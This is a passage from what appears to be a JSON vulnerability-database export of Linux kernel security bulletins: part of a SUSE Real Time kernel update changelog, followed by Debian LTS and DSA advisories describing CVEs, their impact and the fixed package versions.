compute poolbitshift, poolbytes, poolbits\n (FATE#317374).\n * crypto: Limit allocation of crypto mechanisms to dialect which\n requires (bnc#925729).\n * net: relax rcvbuf limits (bug#923344).\n * udp: only allow UFO for packets from SOCK_DGRAM sockets (bnc#909309).\n * acpi / sysfs: Treat the count field of counter_show() as unsigned\n (bnc#909312).\n * acpi / osl: speedup grace period in acpi_os_map_cleanup (bnc#877456).\n * btrfs: upstream fixes from 3.18\n * btrfs: fix race when reusing stale extent buffers that leads to\n BUG_ON.\n * btrfs: btrfs_release_extent_buffer_page did not free pages of dummy\n extent (bnc#930226, bnc#916521).\n * btrfs: set error return value in btrfs_get_blocks_direct.\n * btrfs: fix off-by-one in cow_file_range_inline().\n * btrfs: wake up transaction thread from SYNC_FS ioctl.\n * btrfs: fix wrong fsid check of scrub.\n * btrfs: try not to ENOSPC on log replay.\n * btrfs: fix build_backref_tree issue with multiple shared blocks.\n * btrfs: add missing end_page_writeback on submit_extent_page failure.\n * btrfs: fix crash of btrfs_release_extent_buffer_page.\n * btrfs: fix race in WAIT_SYNC ioctl.\n * btrfs: fix kfree on list_head in btrfs_lookup_csums_range error\n cleanup.\n * btrfs: cleanup orphans while looking up default subvolume\n (bsc#914818).\n * btrfs: fix lost return value due to variable shadowing.\n * btrfs: abort the transaction if we fail to update the free space\n cache inode.\n * btrfs: fix scheduler warning when syncing log.\n * btrfs: add more checks to btrfs_read_sys_array.\n * btrfs: cleanup, rename a few variables in btrfs_read_sys_array.\n * btrfs: add checks for sys_chunk_array sizes.\n * btrfs: more superblock checks, lower bounds on devices and\n sectorsize/nodesize.\n * btrfs: fix setup_leaf_for_split() to avoid leaf corruption.\n * btrfs: fix typos in btrfs_check_super_valid.\n * btrfs: use macro accessors in superblock validation checks.\n * btrfs: add more superblock checks.\n * btrfs: avoid premature -ENOMEM in clear_extent_bit().\n * btrfs: avoid returning -ENOMEM in convert_extent_bit() too early.\n * btrfs: call inode_dec_link_count() on mkdir error path.\n * btrfs: fix fs corruption on transaction abort if device supports\n discard.\n * btrfs: make sure we wait on logged extents when fsycning two subvols.\n * btrfs: make xattr replace operations atomic.\n * xfs: xfs_alloc_fix_minleft can underflow near ENOSPC (bnc#913080,\n bnc#912741).\n * xfs: prevent deadlock trying to cover an active log (bsc#917093).\n * xfs: introduce xfs_bmapi_read() (bnc#891641).\n * xfs: factor extent map manipulations out of xfs_bmapi (bnc#891641).\n * nfs: Fix a regression in nfs_file_llseek() (bnc#930401).\n * nfs: do not try to use lock state when we hold a delegation\n (bnc#831029) - add to series.conf\n * sunrpc: Fix the execution time statistics in the face of RPC\n restarts (bnc#924271).\n * fsnotify: Fix handling of renames in audit (bnc#915200).\n * configfs: fix race between dentry put and lookup (bnc#924333).\n * fs/pipe.c: add ->statfs callback for pipefs (bsc#916848).\n * fs/buffer.c: make block-size be per-page and protected by the page\n lock (bnc#919357).\n * st: fix corruption of the st_modedef structures in st_set_options()\n (bnc#928333).\n * lpfc: Fix race on command completion (bnc#906027,bnc#889221).\n * cifs: fix use-after-free bug in find_writable_file (bnc#909477).\n * sysfs: Make sysfs_rename safe with sysfs_dirents in rbtrees\n (bnc#919589).\n * sysfs: use rb-tree for inode number lookup (bnc#919589).\n * sysfs: use rb-tree for name lookups (bnc#919589).\n * dasd: Fix inability to set a DASD device offline (bnc#927338,\n LTC#123905).\n * dasd: Fix device having no paths after suspend/resume (bnc#927338,\n LTC#123896).\n * dasd: Fix unresumed device after suspend/resume (bnc#927338,\n LTC#123892).\n * dasd: Missing partition after online processing (bnc#917120,\n LTC#120565).\n * af_iucv: fix AF_IUCV sendmsg() errno (bnc#927338, LTC#123304).\n * s390: avoid z13 cache aliasing (bnc#925012).\n * s390: enable large page support with CONFIG_DEBUG_PAGEALLOC\n (bnc#925012).\n * s390: z13 base performance (bnc#925012, LTC#KRN1514).\n * s390/spinlock: cleanup spinlock code (bnc#925012).\n * s390/spinlock: optimize spinlock code sequence (bnc#925012).\n * s390/spinlock,rwlock: always to a load-and-test first (bnc#925012).\n * s390/spinlock: refactor arch_spin_lock_wait[_flags] (bnc#925012).\n * s390/spinlock: optimize spin_unlock code (bnc#925012).\n * s390/rwlock: add missing local_irq_restore calls (bnc#925012).\n * s390/time: use stck clock fast for do_account_vtime (bnc#925012).\n * s390/kernel: use stnsm 255 instead of stosm 0 (bnc#925012).\n * s390/mm: align 64-bit PIE binaries to 4GB (bnc#925012).\n * s390/mm: use pfmf instruction to initialize storage keys\n (bnc#925012).\n * s390/mm: speedup storage key initialization (bnc#925012).\n * s390/memory hotplug: initialize storage keys (bnc#925012).\n * s390/memory hotplug: use pfmf instruction to initialize storage keys\n (bnc#925012).\n * s390/facilities: cleanup PFMF and HPAGE machine facility detection\n (bnc#925012).\n * powerpc/perf: Cap 64bit userspace backtraces to PERF_MAX_STACK_DEPTH\n (bsc#928142).\n * powerpc+sparc64/mm: Remove hack in mmap randomize layout\n (bsc#917839).\n * powerpc: Make chip-id information available to userspace\n (bsc#919682).\n * powerpc/mm: Fix mmap errno when MAP_FIXED is set and mapping exceeds\n the allowed address space (bsc#930669).\n * ib/ipoib: Add missing locking when CM object is deleted (bsc#924340).\n * ib/ipoib: Fix RCU pointer dereference of wrong object (bsc#924340).\n * IPoIB: Fix race in deleting ipoib_neigh entries (bsc#924340).\n * IPoIB: Fix ipoib_neigh hashing to use the correct daddr octets\n (bsc#924340).\n * IPoIB: Fix AB-BA deadlock when deleting neighbours (bsc#924340).\n * IPoIB: Fix memory leak in the neigh table deletion flow (bsc#924340).\n * ch: fixup refcounting imbalance for SCSI devices (bsc#925443).\n * ch: remove ch_mutex (bnc#925443).\n * DLPAR memory add failed on Linux partition (bsc#927190).\n * Revert "pseries/iommu: Remove DDW on kexec" (bsc#926016).\n * Revert "powerpc/pseries/iommu: remove default window before\n attempting DDW manipulation" (bsc#926016).\n * alsa: hda_intel: apply the Seperate stream_tag for Sunrise Point\n (bsc#925370).\n * alsa: hda_intel: apply the Seperate stream_tag for Skylake\n (bsc#925370).\n * alsa: hda_controller: Separate stream_tag for input and output\n streams (bsc#925370).\n * md: do not give up looking for spares on first failure-to-add\n (bnc#908706).\n * md: fix safe_mode buglet (bnc#926767).\n * md: do not wait for plug_cnt to go to zero (bnc#891641).\n * epoll: fix use-after-free in eventpoll_release_file (epoll scaling).\n * eventpoll: use-after-possible-free in epoll_create1() (bug#917648).\n * direct-io: do not read inode->i_blkbits multiple times (bnc#919357).\n * scsifront: do not use bitfields for indicators modified under\n different locks.\n * msi: also reject resource with flags all clear.\n * pvscsi: support suspend/resume (bsc#902286).\n * do not switch internal CDC device on IBM NeXtScale nx360 M5\n (bnc#913598).\n * dm: optimize use SRCU and RCU (bnc#910517).\n * uvc: work on XHCI controllers without ring expansion (bnc#915045).\n * qla2xxx: Do not crash system for sp ref count zero\n (bnc#891212,bsc#917684).\n * megaraid_sas : Update threshold based reply post host index register\n (bnc#919808).\n * bnx2x: Fix kdump when iommu=on (bug#921769).\n * Provide/Obsolete all subpackages of old flavors (bnc#925567)\n * tgcs: Ichigan 6140-x3x Integrated touchscreen is not precised\n (bnc#924142).\n\n Security Issues:\n\n * CVE-2014-8086\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8086\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8086</a>>\n * CVE-2014-8159\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8159\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8159</a>>\n * CVE-2014-9419\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9419\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9419</a>>\n * CVE-2014-9529\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9529\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9529</a>>\n * CVE-2014-9683\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9683\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9683</a>>\n * CVE-2015-0777\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0777\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0777</a>>\n * CVE-2015-1421\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1421\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1421</a>>\n * CVE-2015-2041\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2041\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2041</a>>\n * CVE-2015-2042\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2042\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2042</a>>\n * CVE-2015-2150\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150</a>>\n * CVE-2015-2830\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2830\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2830</a>>\n * CVE-2015-2922\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2922\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2922</a>>\n * CVE-2015-3331\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3331\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3331</a>>\n * CVE-2015-3339\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3339\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3339</a>>\n * CVE-2015-3636\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3636\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3636</a>>\n", "edition": 1, "modified": "2015-08-12T19:09:18", "published": "2015-08-12T19:09:18", "id": "SUSE-SU-2015:1376-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00007.html", "title": "Security update for the Real Time Linux Kernel (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:18:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2014-9730", "CVE-2014-8159", "CVE-2011-5321", "CVE-2012-6689", "CVE-2014-9729", "CVE-2014-9683", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2014-3184", "CVE-2015-2042", "CVE-2015-1805"], "description": "Package : linux-2.6\nVersion : 2.6.32-48squeeze12\nCVE ID : CVE-2011-5321 CVE-2012-6689 CVE-2014-3184 CVE-2014-8159 \n CVE-2014-9683 CVE-2014-9728 CVE-2014-9729 CVE-2014-9730\n\t\t CVE-2014-9731 CVE-2015-1805 CVE-2015-2041 CVE-2015-2042\n\t\t CVE-2015-2830 CVE-2015-2922 CVE-2015-3339 CVE-2015-4167\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\n Jiri Slaby discovered that tty_driver_lookup_tty() may leak a\n reference to the tty driver. A local user could use this flaw\n to crash the system.\n\nCVE-2012-6689\n\n Pablo Neira Ayuso discovered that non-root user-space processes\n can send forged Netlink notifications to other processes. A local\n user could use this flaw for denial of service or privilege\n escalation.\n\nCVE-2014-3184\n\n Ben Hawkes discovered that various HID drivers may over-read the\n report descriptor buffer, possibly resulting in a crash if a HID\n with a crafted descriptor is plugged in.\n\nCVE-2014-8159\n\n It was found that the Linux kernel's InfiniBand/RDMA subsystem did\n not properly sanitize input parameters while registering memory\n regions from user space via the (u)verbs API. A local user with\n access to a /dev/infiniband/uverbsX device could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system.\n\nCVE-2014-9683\n\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\n the allocated buffer during encrypted filename decoding, resulting\n in local denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 / CVE-2015-4167\n\n Carl Henrik Lunde discovered that the UDF implementation is\n missing several necessary length checks. A local user that can\n mount devices could use these various flaws to crash the system,\n to leak information from the kernel, or possibly for privilege\n escalation.\n\nCVE-2015-1805\n\n Red Hat discovered that the pipe iovec read and write\n implementations may iterate over the iovec twice but will modify\n the iovec such that the second iteration accesses the wrong\n memory. A local user could use this flaw to crash the system or\n possibly for privilege escalation. This may also result in data\n corruption and information leaks in pipes between non-malicious\n processes.\n\nCVE-2015-2041\n\n Sasha Levin discovered that the LLC subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n possibly allows privilege escalation from a process with\n CAP_NET_ADMIN capability; it also results in a trivial information\n leak.\n\nCVE-2015-2042\n\n Sasha Levin discovered that the RDS subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n results in a trivial information leak.\n\nCVE-2015-2830\n\n Andrew Lutomirski discovered that when a 64-bit task on an amd64\n kernel makes a fork(2) or clone(2) system call using int $0x80,\n the 32-bit compatibility flag is set (correctly) but is not\n cleared on return. As a result, both seccomp and audit will\n misinterpret the following system call by the task(s), possibly\n leading to a violation of security policy.\n\nCVE-2015-2922\n\n Modio AB discovered that the IPv6 subsystem would process a router\n advertisement that specifies no route but only a hop limit, which\n would then be applied to the interface that received it. This can\n result in loss of IPv6 connectivity beyond the local network.\n\n This may be mitigated by disabling processing of IPv6 router\n advertisements if they are not needed:\n sysctl net.ipv6.conf.default.accept_ra=0\n sysctl net.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\n It was found that the execve(2) system call can race with inode\n attribute changes made by chown(2). Although chown(2) clears the\n setuid/setgid bits of a file if it changes the respective owner ID,\n this race condition could result in execve(2) setting effective\n uid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167 which\nwill be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\n-- \nBen Hutchings - Debian developer, member of Linux kernel and LTS teams\n\n\n", "edition": 9, "modified": "2015-06-17T11:25:37", "published": "2015-06-17T11:25:37", "id": "DEBIAN:DLA-246-1:C824B", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00011.html", "title": "[SECURITY] [DLA 246-1] linux-2.6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:27:56", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2014-9730", "CVE-2014-8159", "CVE-2011-5321", "CVE-2012-6689", "CVE-2014-9729", "CVE-2014-9683", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2014-3184", "CVE-2015-2042", "CVE-2015-1805"], "description": "Package : linux-2.6\nVersion : 2.6.32-48squeeze13\nCVE ID : CVE-2011-5321 CVE-2012-6689 CVE-2014-3184 CVE-2014-8159 \n CVE-2014-9683 CVE-2014-9728 CVE-2014-9729 CVE-2014-9730\n\t\t CVE-2014-9731 CVE-2015-1805 CVE-2015-2041 CVE-2015-2042\n\t\t CVE-2015-2830 CVE-2015-2922 CVE-2015-3339 CVE-2015-4167\nDebian Bug : 789037\n\nThe linux-2.6 update issued as DLA-246-1 caused regressions. This\nupdate corrects the defective patches applied in that update causing\nthese problems. For reference the original advisory text follows.\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\n Jiri Slaby discovered that tty_driver_lookup_tty() may leak a\n reference to the tty driver. A local user could use this flaw\n to crash the system.\n\nCVE-2012-6689\n\n Pablo Neira Ayuso discovered that non-root user-space processes\n can send forged Netlink notifications to other processes. A local\n user could use this flaw for denial of service or privilege\n escalation.\n\nCVE-2014-3184\n\n Ben Hawkes discovered that various HID drivers may over-read the\n report descriptor buffer, possibly resulting in a crash if a HID\n with a crafted descriptor is plugged in.\n\nCVE-2014-8159\n\n It was found that the Linux kernel's InfiniBand/RDMA subsystem did\n not properly sanitize input parameters while registering memory\n regions from user space via the (u)verbs API. A local user with\n access to a /dev/infiniband/uverbsX device could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system.\n\nCVE-2014-9683\n\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\n the allocated buffer during encrypted filename decoding, resulting\n in local denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 / CVE-2015-4167\n\n Carl Henrik Lunde discovered that the UDF implementation is\n missing several necessary length checks. A local user that can\n mount devices could use these various flaws to crash the system,\n to leak information from the kernel, or possibly for privilege\n escalation.\n\nCVE-2015-1805\n\n Red Hat discovered that the pipe iovec read and write\n implementations may iterate over the iovec twice but will modify\n the iovec such that the second iteration accesses the wrong\n memory. A local user could use this flaw to crash the system or\n possibly for privilege escalation. This may also result in data\n corruption and information leaks in pipes between non-malicious\n processes.\n\nCVE-2015-2041\n\n Sasha Levin discovered that the LLC subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n possibly allows privilege escalation from a process with\n CAP_NET_ADMIN capability; it also results in a trivial information\n leak.\n\nCVE-2015-2042\n\n Sasha Levin discovered that the RDS subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n results in a trivial information leak.\n\nCVE-2015-2830\n\n Andrew Lutomirski discovered that when a 64-bit task on an amd64\n kernel makes a fork(2) or clone(2) system call using int $0x80,\n the 32-bit compatibility flag is set (correctly) but is not\n cleared on return. As a result, both seccomp and audit will\n misinterpret the following system call by the task(s), possibly\n leading to a violation of security policy.\n\nCVE-2015-2922\n\n Modio AB discovered that the IPv6 subsystem would process a router\n advertisement that specifies no route but only a hop limit, which\n would then be applied to the interface that received it. This can\n result in loss of IPv6 connectivity beyond the local network.\n\n This may be mitigated by disabling processing of IPv6 router\n advertisements if they are not needed:\n sysctl net.ipv6.conf.default.accept_ra=0\n sysctl net.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\n It was found that the execve(2) system call can race with inode\n attribute changes made by chown(2). Although chown(2) clears the\n setuid/setgid bits of a file if it changes the respective owner ID,\n this race condition could result in execve(2) setting effective\n uid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167 which\nwill be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\n-- \nBen Hutchings - Debian developer, member of Linux kernel and LTS teams\n\n\n", "edition": 7, "modified": "2015-06-17T19:07:21", "published": "2015-06-17T19:07:21", "id": "DEBIAN:DLA-246-2:ABC0D", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00012.html", "title": "[SECURITY] [DLA 246-2] linux-2.6 regression update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:10", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3160-1 security@debian.org\nhttp://www.debian.org/security/ Ben Hutchings\nFebruary 23, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2013-7421 CVE-2014-7822 CVE-2014-8160 CVE-2014-8559 \n CVE-2014-9585 CVE-2014-9644 CVE-2014-9683 CVE-2015-0239\n CVE-2015-1420 CVE-2015-1421 CVE-2015-1593\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leaks or privilege\nescalation.\n\nCVE-2013-7421 / CVE-2014-9644\n\n It was discovered that the Crypto API allowed unprivileged users\n to load arbitrary kernel modules. A local user can use this flaw\n to exploit vulnerabilities in modules that would not normally be\n loaded.\n\nCVE-2014-7822\n\n Akira Fujita found that the splice() system call did not validate\n the given file offset and length. A local unprivileged user can use\n this flaw to cause filesystem corruption on ext4 filesystems, or\n possibly other effects.\n\nCVE-2014-8160\n\n Florian Westphal discovered that a netfilter (iptables/ip6tables) rule\n accepting packets to a specific SCTP, DCCP, GRE or UDPlite\n port/endpoint could result in incorrect connection tracking state.\n If only the generic connection tracking module (nf_conntrack) was\n loaded, and not the protocol-specific connection tracking module,\n this would allow access to any port/endpoint of the specified\n protocol.\n\nCVE-2014-8559\n\n It was found that kernel functions that iterate over a directory\n tree can dead-lock or live-lock in case some of the directory\n entries were recently deleted or dropped from the cache. A local\n unprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\n\n Andy Lutomirski discovered that address randomisation for the vDSO\n in 64-bit processes is extremely biased. A local unprivileged user\n could potentially use this flaw to bypass the ASLR protection\n mechanism.\n\nCVE-2014-9683\n\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\n the allocated buffer during encrypted filename decoding, resulting\n in local denial of service.\n\nCVE-2015-0239\n\n It was found that KVM did not correctly emulate the x86 SYSENTER\n instruction. An unprivileged user within a guest system that has\n not enabled SYSENTER, for example because the emulated CPU vendor\n is AMD, could potentially use this flaw to cause a denial of\n service or privilege escalation in that guest.\n\nCVE-2015-1420\n\n It was discovered that the open_by_handle_at() system call reads\n the handle size from user memory a second time after validating\n it. A local user with the CAP_DAC_READ_SEARCH capability could use\n this flaw for privilege escalation.\n\nCVE-2015-1421\n\n It was found that the SCTP implementation could free an\n authentication state while it was still in use, resulting in heap\n corruption. This could allow remote users to cause a denial of\n service or privilege escalation.\n\nCVE-2015-1593\n\n It was found that address randomisation for the initial stack in\n 64-bit processes was limited to 20 rather than 22 bits of entropy.\n A local unprivileged user could potentially use this flaw to\n bypass the ASLR protection mechanism.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.2.65-1+deb7u2. Additionally this update fixes regressions\nintroduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be fixed\nsoon (a subset is fixed already).\n\nFor the unstable distribution (sid), these problems will be fixed soon\n(a subset is fixed already).\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2015-02-23T17:43:08", "published": "2015-02-23T17:43:08", "id": "DEBIAN:DSA-3170-1:F6570", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00056.html", "title": "[SECURITY] [DSA 3170-1] linux security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:15:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-8134", "CVE-2014-9420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-9584", "CVE-2013-6885", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9585"], "description": "Package : linux-2.6\nVersion : 2.6.32-48squeeze11\nCVE ID : CVE-2013-6885 CVE-2014-7822 CVE-2014-8133 CVE-2014-8134 \n CVE-2014-8160 CVE-2014-9420 CVE-2014-9584 CVE-2014-9585\n\t\t CVE-2015-1421 CVE-2015-1593\n\nThis update fixes the CVEs described below.\n\nA further issue, CVE-2014-9419, was considered, but appears to require\nextensive changes with a consequent high risk of regression. It is\nnow unlikely to be fixed in squeeze-lts.\n\nCVE-2013-6885\n\n It was discovered that under specific circumstances, a combination\n of write operations to write-combined memory and locked CPU\n instructions may cause a core hang on AMD 16h 00h through 0Fh\n processors. A local user can use this flaw to mount a denial of\n service (system hang) via a crafted application.\n\n For more information please refer to the AMD CPU erratum 793 in\n http://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.pdf\n\nCVE-2014-7822\n\n It was found that the splice() system call did not validate the\n given file offset and length. A local unprivileged user can use\n this flaw to cause filesystem corruption on ext4 filesystems, or\n possibly other effects.\n\nCVE-2014-8133\n\n It was found that the espfix functionality can be bypassed by\n installing a 16-bit RW data segment into GDT instead of LDT (which\n espfix checks for) and using it for stack. A local unprivileged user\n could potentially use this flaw to leak kernel stack addresses.\n\nCVE-2014-8134\n\n It was found that the espfix functionality is wrongly disabled in\n a 32-bit KVM guest. A local unprivileged user could potentially\n use this flaw to leak kernel stack addresses.\n\nCVE-2014-8160\n\n It was found that a netfilter (iptables or ip6tables) rule\n accepting packets to a specific SCTP, DCCP, GRE or UDPlite\n port/endpoint could result in incorrect connection tracking state.\n If only the generic connection tracking module (nf_conntrack) was\n loaded, and not the protocol-specific connection tracking module,\n this would allow access to any port/endpoint of the specified\n protocol.\n\nCVE-2014-9420\n\n It was found that the ISO-9660 filesystem implementation (isofs)\n follows arbitrarily long chains, including loops, of Continuation\n Entries (CEs). This allows local users to mount a denial of\n service via a crafted disc image.\n\nCVE-2014-9584\n\n It was found that the ISO-9660 filesystem implementation (isofs)\n does not validate a length value in the Extensions Reference (ER)\n System Use Field, which allows local users to obtain sensitive\n information from kernel memory via a crafted disc image.\n\nCVE-2014-9585\n\n It was discovered that address randomisation for the vDSO in\n 64-bit processes is extremely biassed. A local unprivileged user\n could potentially use this flaw to bypass the ASLR protection\n mechanism.\n\nCVE-2015-1421\n\n It was found that the SCTP implementation could free\n authentication state while it was still in use, resulting in heap\n corruption. This could allow remote users to cause a denial of\n service or privilege escalation.\n\nCVE-2015-1593\n\n It was found that address randomisation for the initial stack in\n 64-bit processes was limited to 20 rather than 22 bits of entropy.\n A local unprivileged user could potentially use this flaw to\n bypass the ASLR protection mechanism.\n\n\n-- \nBen Hutchings - Debian developer, kernel team member\n", "edition": 7, "modified": "2015-02-18T23:22:33", "published": "2015-02-18T23:22:33", "id": "DEBIAN:DLA-155-1:5E8B0", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00009.html", "title": "[SECURITY] [DLA 155-1] linux-2.6 security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3160-1 security@debian.org\r\nhttp://www.debian.org/security/ Ben Hutchings\r\nFebruary 23, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : linux\r\nCVE ID : CVE-2013-7421 CVE-2014-7822 CVE-2014-8160 CVE-2014-8559 \r\n CVE-2014-9585 CVE-2014-9644 CVE-2014-9683 CVE-2015-0239\r\n CVE-2015-1420 CVE-2015-1421 CVE-2015-1593\r\n\r\nSeveral vulnerabilities have been discovered in the Linux kernel that\r\nmay lead to a denial of service, information leaks or privilege\r\nescalation.\r\n\r\nCVE-2013-7421 / CVE-2014-9644\r\n\r\n It was discovered that the Crypto API allowed unprivileged users\r\n to load arbitrary kernel modules. A local user can use this flaw\r\n to exploit vulnerabilities in modules that would not normally be\r\n loaded.\r\n\r\nCVE-2014-7822\r\n\r\n Akira Fujita found that the splice() system call did not validate\r\n the given file offset and length. A local unprivileged user can use\r\n this flaw to cause filesystem corruption on ext4 filesystems, or\r\n possibly other effects.\r\n\r\nCVE-2014-8160\r\n\r\n Florian Westphal discovered that a netfilter (iptables/ip6tables) rule\r\n accepting packets to a specific SCTP, DCCP, GRE or UDPlite\r\n port/endpoint could result in incorrect connection tracking state.\r\n If only the generic connection tracking module (nf_conntrack) was\r\n loaded, and not the protocol-specific connection tracking module,\r\n this would allow access to any port/endpoint of the specified\r\n protocol.\r\n\r\nCVE-2014-8559\r\n\r\n It was found that kernel functions that iterate over a directory\r\n tree can dead-lock or live-lock in case some of the directory\r\n entries were recently deleted or dropped from the cache. A local\r\n unprivileged user can use this flaw for denial of service.\r\n\r\nCVE-2014-9585\r\n\r\n 